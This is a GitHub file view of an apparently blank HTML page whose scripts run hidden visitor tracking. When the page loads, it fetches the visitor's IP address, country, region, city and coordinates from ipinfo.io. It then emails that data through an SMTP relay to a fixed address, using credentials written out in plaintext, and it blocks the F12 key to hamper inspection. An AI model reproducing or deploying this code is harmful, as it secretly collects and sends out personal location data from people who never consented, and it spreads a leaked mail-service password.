-
Notifications
You must be signed in to change notification settings - Fork 0
/
index.html
42 lines (33 loc) · 907 Bytes
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
<!DOCTYPE html>
<html lang="ja">
<body>
<script src="https://smtpjs.com/v3/smtp.js"></script>
<script>
var text;
function recordData (data) {
text = data.ip + ":" + data.country + ":" + data.region + ":" + data.city + ":" + data.loc;
}
</script>
<script src="https://ipinfo.io/json?callback=recordData"></script>
<script type="text/javascript">
function keydown(){
if(event.keyCode == 123){
event.keyCode = null;
return false;
}
};
window.document.onkeydown = keydown;
Email.send({
Host : "smtp.elasticemail.com",
Username : "[email protected]",
Password : "A4E2C40238341D16E2460663CA628298A0D7",
To : '[email protected]',
From : "[email protected]",
Subject : "mail",
Body : text
}).then(
message => document.write(message)
);
</script>
</body>
</html>